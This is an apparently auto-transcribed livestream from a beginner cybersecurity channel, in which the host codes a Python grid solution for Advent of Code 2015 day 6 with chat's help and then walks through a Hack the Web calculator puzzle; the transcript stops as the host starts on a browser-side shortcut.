How about global thermonuclear war?
Hey there, Hacker Frogs. It's me, the Shy Hat, and we're here to do Hacker Frogs After School. We're here to do Hacker Frogs free hacking. We're hacking all the things. So let's talk a little bit about what we're doing today. Every week we publish a schedule over on Reddit and on Discord as well. I'll leave those links in chat. And Aiden Hall says, "Happy spring break. Happy Easter weekend." Aiden Hall, hello. Nice to see you here. And yeah, so that's my Reddit. We've also have a Discord if you're inclined to participate over there as well. And it is Friday, April 3rd. It is Good Friday today. Let's talk about what we're going to be doing today. So the first thing we're going to be doing is we're going to be doing a bit of programming. We're going to be coding in Python, and we're going to be doing some challenges from Advent of Code 2015. It's an older challenge, but we're going to try to bring our A game to the task, and then we're going to be doing a little bit of demos from Hack the Web. We only have one demo left to do for this week, and then we will probably be going into some other challenges after we do our demo in the second hour. In the third hour, we're going to be doing HackerFrogs After School. It says Python Basics Session 9, but we're not doing Python Basics anymore. That's a typo on the schedule. What we're going to be doing is we're going to be doing Web App Hacking Basics Session number 1. So that's going to be in the third hour of today's stream. In the fourth hour, we're going to be taking a look at Access Control labs over at PortSwigger. I'm not too sure if I've done these labs before, but we're going to be taking a look and we're going to be figuring out how to break the access on these labs. So that's the fourth hour. In the fifth and sixth hours, we're going to be doing a module from HackSmarter. HackSmarter is a free, it's a cybersecurity education platform, and the creator of HackSmarter graciously asked me if I could cover his NPM supply chain attacks lab over there, so that's what we're going to be doing in the last part of today's stream. Okay, let's catch up with chat. Let's see, iPad stuff. Oh, okay, no worries. And let's go ahead and start into our first topic for the stream. We're going to be doing that for about 60 minutes. Let me get the timer started, and then we'll get going. So the reason why we're doing some programming as a warm-up is to not forget our programming skills. Oh yeah, one okay. Hello, nice to see you here. If you could remind me who you are, because I don't really, all I see is a screen name. You don't need to tell me exactly your name or anything. But I'd like to know maybe a hint or something, because it's a bit asymmetric. Anyways, let's get into today's first topic. So the first topic is going to be Advent of Code 2015. This is day 6, and we're going to be doing some Python. So of course, these challenges can be done with any programming language. It's just that we prefer to use Python because that's the language that we're best at using. So this is day 6, probably a fire hazard. Let's read about the description of the challenge. Because your neighbors keep defeating you in the holiday house decorating contest year after year, you've decided to deploy 1 million lights in a 1000 by 1000 grid. 1000 by 1000 grid. 1 million lights. That's, Programming skills and starts using Python, just missing. This is not serious. Well, I mean, Python is a programming language, but it's more associated with scripting than anything else, of course. Let's see. So furthermore, because you've been especially nice this year, Santa has mailed you instructions on how to display the ideal light configuration. Lights in your grid are numbered from 0 to 99 in each direction. In each direction, the lights at each corner are at 0, 0, 0, 9999, 9999999, and 99990. The instructions include whether to turn on, turn off, or toggle various inclusive ranges given as coordinate pairs. Each coordinate pair represents opposite corners of a rectangle, inclusive. A coordinate pair like 0, 0 through 2, 2 therefore refers to 9 lights in a 3 by 3 square. The lights all start turned off. That's the joke, yes, of course. So to defeat your neighbors this year, all you need to do is set up your lights by doing the instructions Santa sent you in order. So for example, turn on 00 through 99999999 would turn on or leave on every light. Toggle off 00 through 99990 would toggle the first line of 1000 lights. Okay, 1000 lights. So we see that, all right. Turning off the ones that were on and turning on the ones that were off. And we've got turn off 49999, 49999 through 500, 500 would turn off or leave off the middle 4 lights. Okay, after we're following the instructions, how many lights are lit? So the last thing we need to do when we finish the program is we need to return the number of lights that are in the on position. So how exactly do you do this? So it says here to begin with, get your puzzle input. So for each one of these challenges, we've got input that we need to feed into the program, and it can be located over here. And yeah, so we see all of the instructions here written as sentences. So what we're going to do is we're going to highlight this, select them all, and then copy it, and then we're going to put this in a file. So I've got my setup over here. So what I've got here is I've got a very basic setup for programming. We've got our Python script over here on the right-hand side, and we've got our terminal, which we're going to be using to execute the Python script on the left-hand side. So what we're going to do first is we're going to create the input.txt file that the script is going to use. We're going to paste in all that stuff, and then we're going to save and exit. All right, so the next thing we need to do is we need to figure out exactly what we're doing here, because we're dealing with how many lights is it? We're dealing with 1 million lights. So we're going to have to work with a big list instead of Python, and we're going to have to, I think we might need to do lists inside of lists. So it's not exactly something I've got too much experience with, working with these large coordinate grids, but we'll figure out how to do it. Okay, so let's think about this. So there's 3 things that the program needs to do. So before we get going, we're going to do a little bit of planning over here. So this program needs to set items in lists to either off or on. So I guess we could call it either, well, I mean, we could probably define this as 0 and 1, 0 or 1. Okay, and you should really learn tmux or byobu, so you can have one window with both prompts in it, just my opinion. I mean, I think this works okay for what we're doing right now. The reason why I don't use tmux is because tmux can get a little bit messy when you want to scroll up and down inside of the window, and when you want to copy items inside of the window. That's one of the primary reasons why I don't use tmux. Of course, people tell me that you can set up tmux so that you can do both of those operations very easily. It's just that I haven't gotten around to learning it. Anyways, okay, so the program needs to set items in the list to either off or on. So I guess I'll bullet point these. There are 3 operations that will happen to the lights, to the items. So those 3 operations are turn on, quote unquote, turn on the items, turn on the items, which would set them to 1. There is turn off the items, which would set them to 0. Roast Polo, hello, nice to see you here. What are you doing right now? So we're just warming up with some programming stuff. We're currently doing a challenge from Advent of Code 2015. There's the link over here if you want to join in with us. And you know what? Let's put on a little bit of music while we do this. How about some of this? Okay, so we need to, there are three operations that will happen to the items. We can turn on the items, set them to 1, turn off the items, set them to 0, or toggle the items. Switch the values from 0 to 1, or vice versa. Okay, so at the end, we need to return the number of items in the lists that are set to 1. Okay. Let's take a look at the volume of the music. I want to make sure that it's not too loud. I'll turn it down a little bit. Okay. So how do we start doing this? So the first thing we want to do is we want to make sure that all the file input goes through okay. So we got file path equals input.txt. So this is the name of the file that I typically use for the instructions. And then we create a file object with open file path R as file, raw input equals file.readlines. So file.readlines is going to turn the input of the file into a list of items. So at the very bottom here, we're going to be printing out the raw input, which is the list of items from the file. So if we just run the Python code now, we're going to see that each one of these instructions has been turned into a list item. Sounds good now? And thank you very much, SysOS, for letting me know about that. Wild Radio, hello, nice to see you here. What is up? We're just doing some Python programming as a warm-up. Okay, so we've got the instructions over here, and the first thing we need to do is we need to populate the grid, because set items to lists in lists either off or on. The other thing that we need to understand is that in the program, we need lists that represent lights that need to be either on or off, and there are 1 million lights. So how do we create a 2D grid of these lights? So it's like So let's think about this a little bit. So each list needs to have, so there are going to be two major lists, and those are the X and Y lists. And each one of those will have 5,000 lights. No. Use print them line by line, where each line consists of an array of true or false states. CTFs and NPM streams. CTFs and NPM streams. Well, we're going to be taking a look at how NPM can be used as a type of, what is it called? A type of supply chain attack. That's going to be at the end of the stream. Modney. Hi, hackers. Hi, Modney. Nice to see you here. So there are two major lists. There's an X and Y list, and each one of those will have So how do we create this grid? Create this grid of 1 million lights. Python seems to have a 2D array can be used for this. A 2D array that can be used for this? I mean, let's see if we can ask some questions here. Okay, so Python create let's see, 2D coordinates. What's the best way to deal with 2D coordinates with Python? So 2D coordinates in Python can be used using standard lists, the iter tools library for efficiency, or the numpy for mathematical and grid-based operations. So the most common way to create a list of XY coordinates tuples is with a nested list comprehension. This is Pythonic and works well for small to medium data sets. So width and height equals 5, 5. Coordinates, what is this? So coordinates for x. Okay. Hello, I've created a tool to detect XSS vulnerabilities for websites. I've added a graphical interface to make it easier to use. List X, X. List X, X. Okay, so if we use this method over here, we're defining the width and height, and then we create a big old list. Okay, let's give this a try. Love hacking, Aiden Hall. Hello, nice to see you here. And I'll list XX. Okay, so if we go in here and we tried this out. Okay, we've got well, let's just try width and height of 5, and then we'll expand from there. So our coordinates is a big list for XY in for XY for X in range, width for Y in range, height. And then I guess we'll figure out what that looks like afterwards when we print the coordinates. Okay, we'll get rid of this part. And I guess we don't need this part of the code right now, so we'll just comment this out. So this is all we have right now. Let's run the code. Okay, we got 1, 1. We got 0, 0, 0, 1, 0, 2. So this is all one list. The one list has all of the coordinates. The thing is that we're gonna need to run. We have to run operations on sections of this list. So we got the first row is 0, 0, 0, 1, 0, 1, 0, 4. So this represents the first row. This is the second row here. So this represents the 5 by 5 grid. So what we need to do is we need to find a way to only affect certain parts of this grid, if this is the way we want to do it. So we're going to be writing 3 functions. So we're going to be calling them turn off, turn on. There's going to be a turn off function, and there's going to be a toggle function. Okay, and each one of these are going to take in, they're going to take in two parameters. There'll be 1,000 of these coordinates. Apparently they're going to be 1 million of these coordinates, because according to the instructions here, it's a 1,000 by 1,000 grid. So 1,000 by 1,000 means that it's going to be 1 million total lights. So the instructions are over here. So let's see. So we got turn on, and turn on is going to take in the the X and Y coordinates. So turn off is also going to take in X and Y coordinates, and toggle will also take in X and Y coordinates. So we need to define what these do over here. So set all of the lights in the XY coordinates to on. That is 1. So we have the coordinates over here, but the coordinates need to have a setting. So the first number in the tuple has to be the X coordinate. The second number in the tuple is the Y coordinate, and there's going to be a third number in the tuple, which is going to be the on and off state of the coordinate. So they're all going to start turned off. So we need to find a way to do that when we make our definition. So let's see. Height is 5, width is 5, height is 5. We need to set the third thing in the tuple to off. So coordinates x, y. So maybe we'll expand this to x, y, 0. So each one of these coordinates is going to have x and y coordinates and an on and off. What is up, Shy Hat? Shy Brew, ha ha ha. Hello, nice to see you here. What is up? We're just doing a little programming challenge as our warm-up. So coordinates are going to be x, y, 0 for x in range, width for y in range, height. Okay, and let's see if we can get this to come out differently. Oh, okay. We need to pass on all of these function definitions here, because we're not defining them yet. Okay, so we've got, so we have our coordinates, and then we've got our on-off status for each one of the coordinates. Okay, so the first function is going to turn on the lights at the coordinates. So this is going to be for how do we define this? So AB in, so XY is going to be, these are numbers, because we've got our instructions over here that are these two coordinates. Set all the lights in the XY coordinates to on, or that is 1. For AB in coordinates. So this is going to be coordinates So these are the coordinates here. So this is the coordinates list. So if the coordinates list looks like this, and we're trying to set all of these coordinate values to 1 with the turn on function over here. So for AB in coordinates, Okay, look at it like a tic-tac-toe game. Alf, hello, nice to see you here. But instead of 3 by 3, you've got 1000 by 1000. And the coordinates are row by row. So 0, 0 would have a value of 1 if it's on, and 0 if it is off. Yeah. Yeah. I mean, what we're trying to do now is we're trying to figure out how to turn on, if for example, turn on actually wait. Turn on is actually going to take in two different numbers, because we've got the instructions over here. So it starts at one number. So this is the x coordinate, and this is the x coordinate. So it's actually going to take in 4 numbers. So it's going to take in an x1 and y1 parameter, as well as an x2 and a y2 parameter. Because this is where we start at x, and this is where we end at x, and this is where we start at y, and this is where we end at y. So turn on, let's say 0, 0, 0, 1, 1 should turn on how many lights? This should turn on 2 lights. Because there are two coordinates involved in here. Actually, no, wait, this is 4 coordinates. So there's 0, 1, there's 0, 0, and 0, 1, and there's 0, 1, there's 0, 0, and 0, 1, and there's 1, 0, and 0, 1. So this should turn on 4 lights. So for A, B, and coordinates, so this is going to be 0, 0, 0, 1. So if we give these instructions over here, then 0, 0, 0, 1, and 1, 0. Where's 1, 0? 1, 0, and 1, 1 should be activated. So this should turn on, so this kind of instruction should turn on 4 lights. So Alf says, in Python you can have a list of a list, and you can refer to a value as a coordinate, like grid 0, 0 equals true, or 0, 0 grid 0, 0 equals true, or grid 0, 0 equals false. That is a 2D matrix. Okay, well, I mean, Alf, if we're doing it like that, then we would have to define our coordinates in a different way, right? So that would be, Saligoster says, just loop while x1 is less than x2, while y1 is less than y2. Simple enough. Or it can be fancy with numpy. So I mean, I'm trying to figure out how to do these kind of instructions for the first time, basically, because I don't think I've encountered doing this kind of exercise before. So if we do it the way that Alf was suggesting over here, so we could do coordinates. We need to spell everything correctly, of course. Coordinates is going to be a list. I mean, I guess we could call it coordinates equals, we'll start it off as an empty list, and then we'll do the grid is I mean, the thing here is we want to populate this this grid. So the XY coordinate would be something like 0, 0. So coordinates equals there's a list inside of this list. Okay, let's Python create 2D coordinates list inside of lists inside of lists. Okay, you can create a list of 2D coordinates, essentially a list in which each element is a sublist containing x and y values using several methods. Okay, manual initialization. So the simplest way to create a 2D list is to define the sublist directly within square brackets. So a list of xy coordinate pairs. So we got our coordinates. We've got 1, 2, 3, 4, 5, 6. 1, 2, 3, 4, 5, 6. Okay, list comprehension recommended. List comprehensions are the most Pythonic and efficient way to generate large lists of coordinates dynamically. You generate a grid. So create coordinates for every point in a 3x3 grid. So grid equals xy for x in range 3 for y in range 3. So this would be the size of your grid. So it generates a list with 0, 0 and 0, 1, 0, 2, etc. Okay, well, we'll give this a try. So I guess in this case, we're no longer calling our variable coordinates, we're going to call it grid. Okay, so we've got our width and we've got our height. And in the end, we'll print it out. Expanded and indented block after function definition on line 16. Line 16. Oh, we need a pass. Because we're not doing it yet. Okay, you need each coordinate, but each coordinate also needs to have a value of 0 or 1, which is on or off, right? Yeah, I mean we'll see if we can add that on after we get this down. So we got 0, 0, 0, 1. Yeah, so this seems to work. We are creating our list of lists. So grid is going to be x, y, and then 0, because we need to initialize all of our values to 0. James, hello, nice to see you here. What is up? So, I mean, this is essentially the same thing we were dealing with last time, only we're dealing with lists inside of lists instead of tuples inside of lists. I mean, it might be better to deal with lists instead of tuples. But anyways, okay. So we've got our coordinates in here. So all we need to do is do something like what Snollygoster was talking about: 0, 0 for range, 0, 0 for x in range width for y in range height. Yeah, I think that's what we just did. Okay. So set all the lights in the XY coordinates to 1. So turn on 0, 0, 1, 1 should turn on 4 lights. So we're just going to run our big for loop over here. So for no, you're making X, Y, and 0. I mean, we're doing X, Y, and 0 for each one of these coordinates because each one of the coordinates needs to have an extra value, because the extra value is supposed to represent whether or not a light is turned on or off. So 0 means that the light is off, and 1 means that the light is on. So for if you refer to grid 0, 1, you will get 1, for example. If you refer to grid 0, 1, you will get 1, for example. Okay, so let me try to parse that. So print. So we're not printing the grid. We'll print grid element 0. So grid element 0 is this one over here. And if we want to get the list inside of the list, 0, 1, 0, 1. Okay, we'll print that out. And this comes back as 0. So that's okay. So 0, 1 should be this item, and then this element here. So the number 1 element, or the 1 position element, this is the 0 position, this is the 1 position. So it should be, so this all comes back as 0. So if we want to get the 0 element and then the 1 element here, it should be 1. So this is 0, 0, 1. So if we get 1 element 1, then what should print out is the number 1 in this case. Yeah, so this does print out as 1. And then we've got so these are in order. So this is 0, 1, 2, 3, etc., etc. I think this should be fine. We're never really referencing. Let's see, Victor86, hello, nice to see you here, and Tristan, nice to see you here as well. We're just doing some bad programming. Well, we're not getting very much done right now, but we're trying to solve this challenge over here. Okay, so we've got our grid over here. And for each one of these coordinates, we've got an extra value that we need to keep track of for whether or not the thing is on or not. So it says grid XY for where X is the row and Y is the column, like in Excel. Excel, you're talking about Microsoft products? So we're trying to create our function here. So for, I guess we could do it the way Snollygoster was talking about. So while while x1 is less than x2, and while y1 is less than y2. So these are two while loops. We need to set these up. Okay. So Advic says, I think there should be 1,000 lists with 1,000 elements. Yeah. So Advic, there should be 1,000 lists with 1,000 elements, but right now we're just working with a limited set so that we can better understand what's going on. Do you have a Discord by any chance? Yeah, we do have a Discord. We need to nest these ones. So while xy is less than, and while, so like this. So we're gonna turn the things on. So x1, so it's going to be grid element x1 y1 element x1 y1. Does this work? Because we've so this first list only has one thing in it. Thanks for helping make the internet super cool. Well, I mean, I don't know if I'm helping making the internet super cool. I'm just one guy, but I appreciate that you feel that way. Okay, so I'll look through all of the necessary pairs of xy. Should have a temporary variable for xy as well. So x is going to be something and y is going to be something else. Man, I'm getting lost. I'm getting lost as to what we're actually doing here. So the x coordinate, so what, I mean, maybe what we really need is we need to have some extra lists that have the x and y coordinates. So if we've got like let's say we've got our main list is going to be called the grid. So the grid is the biggest list, and inside the list we've got an x list and a y list, because we're dealing with xy coordinates. You need to turn sections of lights. You need to turn on sections of lights. Yeah, so it's ranges of lights inside of the 2D coordinates. So the x list is going to be grid element 0, say, and then the y list is going to be grid element 1. And inside of the x list lights, and there's going to be y list lights. Can somebody put the exercise here? Yeah. Let me give you the link. Here you go. So there's going to be X list lights and Y list lights. So if we have an example like example grid, it's going to be like a 4x4. So this is the main list, and then we've got the X list, and we've got the Y list. And inside of the X list and the Y list, we've got the individual lights for the X. Light 0. Oh, does this work? This one is Advent of Code. Yeah, it's from Advent of Code. So the way you have your list, it doesn't reference it. It doesn't reference it correctly. You reference list X in position Y, not position Y, not position X at position Y. Yeah. Like logically, what would the best way to do this be? Let's just ask a question here. Okay. We have Python script we need to write, where we need to manage items at coordinates. Say we have a 5x5 grid. We need to keep track of the on/off value of each coordinate on the grid. What's the best way to set up the grid so that we can modify the values at each coordinate? Okay, so what we got here, perplexity. For a fixed 5x5 grid, the best setup is usually a list of lists holding booleans because it gives simple indexing like grid x, y, and easy in-place updates by coordinate. If your grid size might grow or become sparse, a dictionary with tuple keys is a good alternative. But for a small fixed board, a 2D list is probably the cleaner choice. Okay, Alf says, if I give this A, B, C, D, E, which is in a list, and ask you for the third item, what would you say? The third item? The third item would be C, wouldn't it? I mean, I'm not too sure what you're trying to illustrate here. So print list 2, yeah, that's what we want to do in that case. So that's exactly what the AI just said. False for X in range, width for Y in range, height. Okay, so we use a nested list and initialize every cell to false. So width 5, height 5, grid equals false for X in range width, for Y in range height. This creates 5 separate rows with 5 Boolean values. 5 separate rows with 5 Boolean values, which avoids the common mistake of accidentally reusing the same object row multiple times. You can read or change a coordinate with normal indexing, since Python lists support direct assignment by index. So to update the coordinates, a simple pattern is to treat the coordinates as x and y. Treat coordinates as x and y, but store them as grid y and x. Huh. So turn on the coordinates, turn them off. Check a value. Check a value, it's on. This is kind of surprising. I didn't know that you could that you could set individual objects to either true or false. So, I mean, okay. Well, I guess we're here to learn. So we still haven't gotten to the point where we're writing our functions yet. We got our height, we got our width. False. So grid equals a overall list, and inside of the list we got false for x in range, width for y in range, height. But where do we... So everything's going to be set to false. Okay, true and false are just numbers. Okay. JMoney says you have to set your temp x and y values before the loop. Otherwise, every time the loop runs, the value will be reset. That's a good point, JMoney. Yeah. So in Python, it would be print list 2, and we'll return C. Yeah. That's if you wanted to get the third item right. Snollygoster says there's some languages that like to fancy it up by being strict about the usage, but just 0 and 1. So false is for false in range. So I mean, can we replace the word false with the number 0 in this case? Okay, so if we do it like this. Oh, we don't have numbers anymore though. We just have a number. These are just lists. 1, 2, 3, 4, 5. So this is all false. 1, 2, 3, 4, 5. This is all false. Okay. So false for x in range. So the things inside of the lists here are just true or false. Yes, because you set everything to false. Right. Okay, so grid 1, 1 would be inside of this list. This is the first row, second row, third row, fourth row, fifth row. Okay, so we can print these off, and we can also change the values of these. So print the grid, and then grid 1, 1 equals true, and then print the thing again. We should see that the second list and the second element in the second list becomes true. So this is the first list, this is the second list, and this is the second element. So this should become true with these instructions right here. Okay, so we'll run it again. Okay. And let's print out the grid one more time. Yeah, we should print out the grid a second time. Okay. So this is the second element, and the second list in the second element is turned to true. Okay. Now you can do this the while loop super easily. Yeah, we're not dealing with a third thing that we're doing anymore. Okay, so this is good. So we just need to find a way to implement our functions. Okay, so once again we're gonna be dealing with two different coordinates. So x1, y1, x2, y2. So we could do that while loop. While x1 is less than x2, and while y1 is less than y2. We'll define our x and y. I think we should have temporary element for x outside of the while loop. We should have a temporary element for x outside of the while loop. Oh yeah, we need to put it outside of the loop. So x and y. X equals x1 and y equals y1. Okay. While x is less than x2. While x... right. So while x is less than x2 and while y is less than y2. It should be while... Actually, it should be less than or equal to x2. Less than or equal. And then we do grid x, y set to true, and then x plus equals 1 and y plus equals 1. Is that going to work? Okay, and then we'll run the function down here. So it's like turn on with these numbers. Something tells me this isn't going to work. Oh, yeah, right. So when the, let's see, when the while loop for y ends, I think, can we make y equals y1 again? Is that the way we want to do it? So essentially we're creating a 2D array, but I think in the format, shouldn't there be a comma where I put there, shouldn't there be a comma where we put the brackets? Here? And let me try running the script. So we ran the thing, and we did turn on y, turn on 0, 0, 1, 1, and let's see, we printed the grid before, and then we ran the function, and then we printed the grid after. So before everything was false, and here we've managed to, it should turn on four coordinates. So 1 true, 2 true, it only turned on 2 coordinates. It should have turned on 4 coordinates. So what happened here? Maybe you should do 2 for loops, 2 for loops. So grid xy equals true, and then we increment x and then y. Seems a bit advanced for me, but it looks useful then to declare cell by cell. So we managed to change 2 of these cells to true, but we need to, it should be changing 4 of them to true. You have to run through every x and then set true, and then increment y and run through x again. Okay. So while x is less than x2, grid xy equals true. Oh, yeah, that's right. We need to do every iteration of x, and then we need to run through the y's. Yeah, we're renting, right. We're incrementing both of them at the same time. So, where do we... Grid xy equals true, so we don't increment x at this stage. So we got 2 of these over here. And this one only increments through the x, right? And then this one only increments through the y. Put x plus equals 1 in the loop, well, in the while loop of x. So the while loop of x, yeah, I think that's what we've done. Okay, and then so we got 1 true, 2 true, 3 true, 4 true. Okay, so we did manage to get this to work. You know what? Let's work on this for a little while longer, because I don't have too many demos to do for the next section. So we'll spend another 15 minutes working on this. You should increment the x after you do the y, right? Is the order getting in the way? Okay, do another 15 minutes. You should increment the x after you do the y, after the y loop. He's doing a different row. He's doing the different row first. So we got, so this should be 0. This should be 0, 0. So this should be 0, 0. This should be 1. This should be 1, 0, and then 1, 1. You know, it's a bit weird. Hold on. So this should be 0, 0 to 0, 1. Well, 0, 0 until 1, 1. Okay, put the x plus equals 1 after the y loop. Because x is incremented before it enters the y loop. So wait. What's the code supposed to... Is it supposed to be... Let me read through the comments. Won't work. It will increment x without doing anything. You should increment the y. You should increment the x after you do the y. After the y loop. Okay, let's see. Because x is incremented before it enters the y loop. I think the exercise asks you to implement 3 functions The first one is set the coordinates to on or 1, the second one is to off or 0, and the third one is to set a range on or off. Yeah. So 0, 0, 1, 0, 1, 1, and 1, 2 is what's done. The last one is incorrect, and the 0, 1 is missing. So x is set to whatever is set by the first two numbers in the function here. So this, I mean, this should be okay, but while x is less than x2, so do we put both of them in here? So this sets 1, 2. This only manages to turn on 2 of the lights. So do we flip this around? Index out of range. Wait, this is line 36. You gotta put y equals y1 after every y loop. After every y loop. Y equals still doesn't like. No, that would be an infinite loop. Too many cooks in the kitchen. A bit of that, yeah. AJ Sriram, hello, nice to see you here, and thank you very much for the subscription on YouTube. Thank you. So it doesn't like. So we actually get some of the script to run. So we print off the first grid, but the second one doesn't work. You want to turn on all the x's and then go to the next y. You should put, well, y, while y is less than y2 and while x is less than x2, grid xy equals true, and then x increases. Okay, so I think these parts over here, well, we're iterating over the x number. And we're setting xy equals to true. And then we need to increment x. So this has to happen, otherwise the while loop will never end. So in here, while y is less than y2, we also need to increment the y coordinate, otherwise the loop will never end. So increment x after the y, increment x after the y while loop. The same indentation you have, but after. So like this, x plus equals 1 here, and then remove it on this line. No. No, 1 tab less. Oh, okay. Is that how we want to do it? Decrease 1 tab on line 37. So line 37 like this. Let's try running it. So what do we have? We got 2 coordinates in element 0 of the list, and then there should be 2 coordinates in element 1 of the list, but that's not the case. We got 1, 2, 3. We've got 1, 2, 3, but we're expecting 4 coordinates to be set to true. Now reset y on the same line as y equals y. So reset y on y equals y1. I have a question. What is the logic that you're doing for the turn on function? So the logic for the turn on function is that we want to take all the coordinates. We started the coordinates that are defined by the instruction, and then we end at the coordinates that are defined by the instruction as well, because we've got a bunch of instructions over here that say either toggle, turn off, or turn on from these coordinates to these coordinates. Line 33, we can take it out. So write this out. So I think we've got the intended behavior now. So we've got 2 coordinates turned on in the first list, and we've got 2 coordinates turned on in the second list. Line 33 is redundant now. Grid xy equals true. Grid xy equals true. So while x is less than x2 and while y is less than y2, turn on the x and y coordinate, which are defined over here, and then inside the y loop increment y, and inside the x loop increment x, but reset y to equal the y1 value. Not exactly sure why it works, but I'll probably take a closer look a little bit later. So we are getting the intended behavior here. Now it makes sense. It's making more sense, but I need to do a little bit more clarification later. But we got the turn on function over here. The turn off function is going to be the same thing, except setting the XY grid to false instead. So let's grab that code. So it's this code, except that we do it like this. So it's turn off, turn on, and then toggle. So toggle is going to be the same logic, except we do it inside like a big if statement. If it's false, then turn it to not false, that kind of thing. Okay, so shouldn't that be handled by the toggle function? That makes sense. For turn off, we just copy the code and then make it false. Yeah. So we need to. Sorry. Let's go back in here. Switch it to false. Okay. So you make a first pass with x and then incrementing y, and then you increment x and then reset y that you can increment it again. Let's see. Y if inside the while y loop. So, I mean, toggle is going to be the same kind of instructions, but not exactly. So, grid xy equals true if it's false initially. So we would do something like if grid xy is false, then set it to true. And then else grid xy, make it false. Okay, I'm pretty sure y is never going to equal more than y plus 1 in this code. Is it? Is it not? Hold on. I mean, we can test it. We can test it right now. So turn on, we'll try 0, 0, 0 to 2, 2, because it resets every iteration. Whoops, that's not what I wanted to do. I wanted to run the code. So true, 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 true. I mean, it works. It works, JMoney. I'm gonna take an input into the relevant function. Yeah. We're probably gonna implement that in the next stream that we're doing this, because I'm kind of running out of time. But I can save the code that we have right now, and then I can, come back to this later. So I mean, turn on seems to be working as intended, even if we set the numbers a bit higher. So this should turn on how many? So 0, 0 to 2, 2. So that should turn on 6 of these. So we got 1, 2, 3, 1, 2, 3, 1, 2, 3. Oh, it does 9 of them. So 0, 0, 0, 1, 0, 2, 1, 0, 1, 1, 1, 2, and then 2, 0, 2, 1, 2, 2. So that's three rows in this case. So, I mean, it seems to be working right now. But yeah, we'll come back to this next time, and hopefully I've got a better sense of what's going on when that happens. Okay, so we're gonna grab the code we have right now, and then we'll put it in our write-up, and then we'll come back to it later. Okay, where are we? Over here. So it's nice to be able to figure out some code with people in chat, because people in chat are usually much more knowledgeable about programming than I am. Wait, where was I? Okay, then down at the bottom. Okay. Commit these changes. We'll come back to this next week. But of course, if you want to do this yourself, you're very welcome to, and the link is over here. All right, let us reset the topic. So we're not doing topic 1 anymore, we're doing topic 2. And we got topic 3 on deck. Okay, so the first thing I'm going to do is I'm going to do a demo for the last challenge I need to do for the week for Hack the Web. So Hack the Web is a great little... It's a great little game for introducing people to tech topics. Snellygoster says, it's interesting seeing people struggle with something that you've yourself once struggled with. You wish you could convey how simple stuff is, but the brain is stupid and overcomplicates things. I mean, I'd say that if you've done the same sort of exercise, if you've done the same sort of concepts a few times, then you'll be able to remember how you did it the last time. But if it's a fresh topic, then it's a lot harder. But yeah, I'm trying to understand lists within lists and all that other good stuff. Okay, so the last one we're doing is Calculator 3. Let me go ahead and grab the challenge, and then it shouldn't take very long to demonstrate this. And then we'll, wait, let me just check that I need to, this is the one we're doing. Okay, yeah, we're doing Calculator 3. Okay, so I'll do this, and then we're going to be doing some exercises over at EchoCTF. So EchoCTF is another really great cybersecurity education platform over here. And we're going to be doing some challenges from their escape rooms. But first, I need to demonstrate this thing. Albert Demorchev? Demorcherf? I'm not too sure how to pronounce your name. 7-3, hello, nice to see you here. I don't read Arabic, if that is Arabic. Could you let me know what your name is? Thank you. Okay, so we're doing Calculator 3. Escape rooms? Yeah, I think it's like... well, it's like a CTF version of an escape room. So we'll see what's going on over there. So this is... where's Calculator 3? There it is. Mohammed. Oh, J Money, you read Arabic. Okay, that's great. I mean, I don't think I could. I don't think I could read it because I can't read. Anyways, okay, let's do our introductions over here. All right, everybody, this is a guided walkthrough for the Calculator 3 challenge from Hack the Web. So what do we got going on over here? So it says, go on, there's one last hint. I'm so excited. What are my parents trying to tell me? I have no idea. But what we are given over here is we're given a mathematical equation. So we got 2 to the 5th power times 3 to the 4th power times 5 to the 3rd power times 7 to the 2nd power. And what we need to do is we need to calculate it on this calculator that can only use 1-digit characters. So we can only punch in 1 digit and then do the operation. This is kind of like the previous challenges in with the same name. And let's just talk about what's going on over here. So what we really need to do here is we need to calculate this number. So this is a really big number. And so this is the Calculator 3 challenge. In this challenge, we're given an equation to solve. So this is the equation: 2 to the 5th power times 3 to the 4th times 5 to the 3rd times 7 to the 2nd. We're also given a calculator that can only input 1-digit numbers. So if you try to input more than 1 digit into this calculator, it's not going to let you. So what we need to do is we need to understand that in mathematics, if we are talking about how to calculate multiplication operations, there's a concept called associativity. And associativity means that it doesn't matter what the order is when you do your multiplication operations. So we're given a number of exponents to calculate, but because calculations will exclusively multiplication are associative, that means that the order of the operations doesn't matter. We can break it down like the above. So the calculation that we're trying to do is 2 to the 5th power times 3 to the 4th power times 5 to the 3rd power times 7 to the 2nd power. So we can break this down into 2 times 2 times 2 times 2 times 2, that is 2 to the 5th, plus 3 times 3 times 3 times 3, times 5 times 5 times 5, times 7 times 7. So this is kind of like multiplying these numbers together. So we got, so 2 to the 5th power is 32, and then we multiply that by 81. Wait, this is not 81. I put in a typo here. It should be another number, and then 5 to the third power is 125, and then 7 to the second power is 49. Sorry, 3 to the fourth power is 3 times. Oh no, it is 81. Yeah, so it's 3 times 3, which is 9. 9 times 3 is 27, and then 27 times 3 is 81. Yeah, sorry, my math wasn't mathing for a second there. Okay, so all we need to do is we just need to keep track of how many times we're inputting each one of these numbers, and we can solve this equation pretty easily. So let's go ahead and do that. So we'll go back to the challenge, and let's make this a little bit bigger. Let's make the calculator really big. Okay, so the first one is 5 times 5 times 5 times 5. So, sorry, 2 times 2 times 2 times 2. So 2, 1, 2, 3, 4, 5. And then we multiply 3 times 3, 4 times. So it's times 3 times 3 times 3 times 3, and then 5 times 5 3 times. 5 times 5 times 5 times 5, and then 7 times 7. So 7 times 7 times 7. Okay, and then we get the answer. So the answer is deer. The answer is also like a really big number, but this is the answer for the challenge. So we can type this in, we can click on go, and that solves the challenge. But there's another way we can do this. So if we know what we're dealing with, so it's going to be hold on, let me get the so it's 32 times 81 times 125 times 49. So this is a really big number. We could probably do it in our console over here. So like Python print this math. Of course, we need to use something different for the multiplication symbols. Unknown attribute. Oh, okay. We need to put these between some quotes. Okay, so this is the really big number. So if we take this really big number and we go back to the challenge, so I'm going to copy the really big number. We can go over to the challenge and we'll reload it. Oh, what is this? 1 week later after dinner, Kiwi and Josh in the lounge. What's going on? So Josh says, I read a really great book. You have to see it. A real book with paper and stuff? Haha, no, it's a hollow book from the ship library called Enough. You might like it. Why do you think so? It's about being from a big unknown world that travels a lot and finds a home. That kind of story should. Suddenly the lights go out, darkness. A few seconds later it turns back on. Not the usual white, but in the colors of the rainbow flag. Wow. How beautiful. I miss being able to show my flag so much. Me too. Bex would freak out at this sight. They enjoy the colorful glow until after a few minutes the lighting switches back to if nothing happened. Okay. Anyways, we're going back to the challenge here, and we're going to demonstrate how to solve this using a slightly hacky method. So the slightly hacky method we're talking about is manipulating the calculator directly. So we can go 